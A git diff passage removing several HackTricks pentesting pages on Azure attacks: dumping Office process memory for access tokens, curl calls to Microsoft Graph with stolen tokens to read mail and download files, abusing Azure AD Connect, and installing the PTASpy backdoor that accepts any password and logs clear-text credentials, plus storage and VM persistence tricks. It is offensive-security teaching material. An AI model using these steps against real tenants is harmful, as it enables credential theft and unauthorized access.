-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
deleted file mode 100644
index 3512fd876..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# Az - Processes Memory Access Token
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## **Basic Information**
-
-As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
-
-Steps:
-
-1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
-2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
-3. Find the tokens that interest you the most and run tools over them:
-
-{% code overflow="wrap" %}
-```bash
-# Check the identity of the token
-curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq
-
-# Check the email (you need a token authorized in login.microsoftonline.com)
-curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq
-
-# Download a file from Teams
-## You need a token that can access graph.microsoft.com
-## Then, find the inside the memory and call
-curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq
-
-## Then, list one drive
-curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq
-
-## Finally, download a file from that drive:
-┌──(magichk㉿black-pearl)-[~]
-└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>'
-```
-{% endcode %}
-
-**Note that these kind of access tokens can be also found inside other processes.**
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
deleted file mode 100644
index 109104b7e..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
+++ /dev/null
@@ -1,86 +0,0 @@
-# Az AD Connect - Hybrid Identity
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments:
-
-* **Pass-Through Authentication (PTA)**:
- * Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud).
- * Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem).
-
-{% content-ref url="pta-pass-through-authentication.md" %}
-[pta-pass-through-authentication.md](pta-pass-through-authentication.md)
-{% endcontent-ref %}
-
-* **Password Hash Sync (PHS)**:
- * Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user.
-
-{% content-ref url="phs-password-hash-sync.md" %}
-[phs-password-hash-sync.md](phs-password-hash-sync.md)
-{% endcontent-ref %}
-
-* **Federation**:
- * Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities.
-
-{% content-ref url="federation.md" %}
-[federation.md](federation.md)
-{% endcontent-ref %}
-
-* **Seamless SSO:**
- * Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user.
-
-{% content-ref url="seamless-sso.md" %}
-[seamless-sso.md](seamless-sso.md)
-{% endcontent-ref %}
-
-* **Cloud Kerberos Trust**:
- * Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD.
-
-{% content-ref url="az-cloud-kerberos-trust.md" %}
-[az-cloud-kerberos-trust.md](az-cloud-kerberos-trust.md)
-{% endcontent-ref %}
-
-* **Default Applications**:
- * Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files.
-
-{% content-ref url="az-default-applications.md" %}
-[az-default-applications.md](az-default-applications.md)
-{% endcontent-ref %}
-
-For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain.
-
-To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used:
-
-```powershell
-Get-ADSyncConnector
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
deleted file mode 100644
index 357b0f863..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# Az - Default Applications
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8)
-
-The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
deleted file mode 100644
index d2c2f4287..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md
+++ /dev/null
@@ -1,61 +0,0 @@
-# Az- Synchronising New Users
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD
-
-I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements:
-
-* The **AzureAD user** needs to have a proxy address (a **mailbox**)
-* License is not required
-* Should **not be already synced**
-
-{% code overflow="wrap" %}
-```powershell
-Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl
-```
-{% endcode %}
-
-When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email.
-
-An automatically, this user will be **synced from AzureAD to the on-prem AD user**.
-
-{% hint style="danger" %}
-Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**.
-
-Also, this **won't bypass MFA**.
-
-Moreover, this was reported an **account sync is no longer possible for admin accounts**.
-{% endhint %}
-
-## References
-
-* [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
deleted file mode 100644
index d84673358..000000000
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md
+++ /dev/null
@@ -1,100 +0,0 @@
-# Az - PTA - Pass-through Authentication
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**.
-
-In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS.
-
-The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC).
-
-### Authentication flow
-
-
-
-1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password**
-2. The **credentials** are **encrypted** and set in a **queue** in Azure AD
-3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.**
-4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user.
-
-{% hint style="warning" %}
-If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\
-He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key).
-{% endhint %}
-
-### On-Prem -> cloud
-
-If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication):
-
-```powershell
-Install-AADIntPTASpy
-```
-
-{% hint style="info" %}
-If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe).
-{% endhint %}
-
-It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed:
-
-```powershell
-Get-AADIntPTASpyLog -DecodePasswords
-```
-
-This backdoor will:
-
-* Create a hidden folder `C:\PTASpy`
-* Copy a `PTASpy.dll` to `C:\PTASpy`
-* Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process
-
-{% hint style="info" %}
-When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed.
-{% endhint %} - -### Cloud -> On-Prem - -{% hint style="danger" %} -After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** -{% endhint %} - -### Seamless SSO - -It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: - -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} - -## References - -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) -* [https://aadinternals.com/post/on-prem\_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
deleted file mode 100644
index d8149527a..000000000
--- a/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Az - Permissions for a Pentest
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md b/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
deleted file mode 100644
index e7c185893..000000000
--- a/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# Az - Queue Storage Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Queue - -For more information check: - -{% content-ref url="../az-services/az-queue-enum.md" %} -[az-queue-enum.md](../az-services/az-queue-enum.md) -{% endcontent-ref %} - -### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` - -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - -{% code overflow="wrap" %} -```bash -az storage queue create --name --account-name - -az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name - -az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name -``` -{% endcode %} - -## References - -* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues -* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api -* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
deleted file mode 100644
index 196d5ebf4..000000000
--- a/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
+++ /dev/null
@@ -1,72 +0,0 @@
-# Az - Storage Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Common tricks - -* Keep the access keys -* Generate SAS - * User delegated are 7 days max - -### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write - -These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage account blob-service-properties update \ - --account-name \ - --enable-container-delete-retention true \ - --container-delete-retention-days 100 -``` -{% endcode %} - -### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action - -These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. - -{% code overflow="wrap" %} -```bash -az storage blob service-properties delete-policy update \ - --account-name \ - --enable true \ - --days-retained 100 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
diff --git a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
deleted file mode 100644
index 5f67c2b12..000000000
--- a/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# Az - VMs Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## VMs persistence
-
-For more information about VMs check:
-
-{% content-ref url="../az-services/vms/" %}
-[vms](../az-services/vms/)
-{% endcontent-ref %}
-
-### Backdoor VM applications, VM Extensions & Images
-
-An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
-
-### Backdoor Instances
-
-An attacker could get access to the instances and backdoor them:
-
-* Using a traditional **rootkit** for example
-* Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
-* Backdooring the **User Data**
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
